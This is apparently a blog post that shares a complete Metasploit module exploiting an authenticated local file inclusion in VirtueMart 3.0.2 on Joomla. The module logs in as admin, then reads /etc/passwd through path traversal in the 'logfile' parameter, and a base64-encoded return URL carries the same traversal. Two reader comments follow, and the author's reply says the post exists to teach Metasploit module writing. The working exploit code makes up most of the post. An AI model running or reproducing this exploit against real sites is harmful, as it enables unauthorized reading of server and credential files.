Because it's for Joomla again, again it's based on HikaShop LFI poc.
Enjoy:
 |
| Preparing to exploit... |
 |
| Raw results |
And the code:
---<virtuemart_auth_lfi.rb>---
root@kali:/var/www# cat virtuemart_lfi.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'VirtueMart 3 - LFI poc for authenticated users',
'Description' => %q{
VirtueMart 3.0.2 is vulnerable to local file include attack.
Authenticated user can read local files from the server.
More here: https://twitter.com/HauntITBlog
},
'Author' =>
[
'HauntIT Blog', # Discovery
# MSF module (based on http://hauntit.blogspot.com/2015/01/en-hikashop-lfi-metasploit-module.html)
'http://hauntit.blogspot.com'
],
'License' => MSF_LICENSE,
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => ' 23.12.2014'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']),
], self.class)
end
def check
end
def fetchMd5(my_string)
if my_string =~ /([0-9a-fA-F]{32})/
return $1
end
return nil
end
def exploit
# 1st, we will get cookies and token
req1 = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'administrator','index.php')
})
cookies = req1['set-cookie']
if not req1
fail_with("[-] Failed with 1st request")
end
print_status("[+] Good: " + req1.code.to_s)
print_good("[+] Got cookie(s): " + cookies)
token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
if req1.body =~ token_pattern
token = fetchMd5(req1.body)
print_good("[+] Got token: "+ token.to_s)
else
print_status("[-] Token not found")
end
# now we need to do auth using that token and cookies
print_status("[+] Trying to auth...")
auth = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'administrator','index.php'),
'cookie' => cookies,
'vars_post' => {
'username' => datastore['USERNAME'],
'passwd' => datastore['PASSWORD'],
'option' => 'com_login',
'task' => 'login',
'return' => 'aW5kZXgucGhwP29wdGlvbj1jb21fdmlydHVlbWFydCZ2aWV3PWxvZyZ0YXNrPWVkaXQmbG9nZmlsZT0uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
token.to_s => 1
}
})
print_good("[+] Code after auth: " + auth.code.to_s)
# 3rd step: get + post params to lfi
print_good('[+] Exploit...')
readthis = "../../../../../../../../../../../../../../../../../../etc/passwd"
xpl = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'administrator','index.php'),
'vars_get' => {
'option' => 'com_virtuemart',
'view' => 'log',
'task' => 'edit',
'logfile' => readthis
},
'cookie' => cookies
})
if xpl
print_good("[+] Exploit response code: " + xpl.code.to_s)
print_good("[+] Response body after attack:")
print_status(xpl.body)
else
fail_with("[-] Cannot exploit it :C")
end
end # exploit
end
---<virtuemart_auth_lfi.rb>---
Pastebin version is here.
Cheers,
o/
To be clear, you have to know the administrator username and password of the site in order to be able to carry this out. But if you already know these then you can do pretty much anything you want with the site anyway, eg add your own php code to the template to include any file you want, so why do you need to do things this way. It is hard to see why you think this is a real exploit.
ReplyDeleteHi, first of all: thanks for watching. Ad. your comment: yes, you need admin's credentials to exploit this vulnerability, yes, you can add your own PHP code to templates as well (when you have those credentials). In some CMSs, probably you can even run SQL query directly from the webapp... but :) This post is not about super cool & advanced new hacking extreem technique. This post was published to help guys to learn how to write your own modules for Metasploit. That's all. And that's why vulnerability exploited by this poc code was described here - it's a nice example. Cheers.
ReplyDelete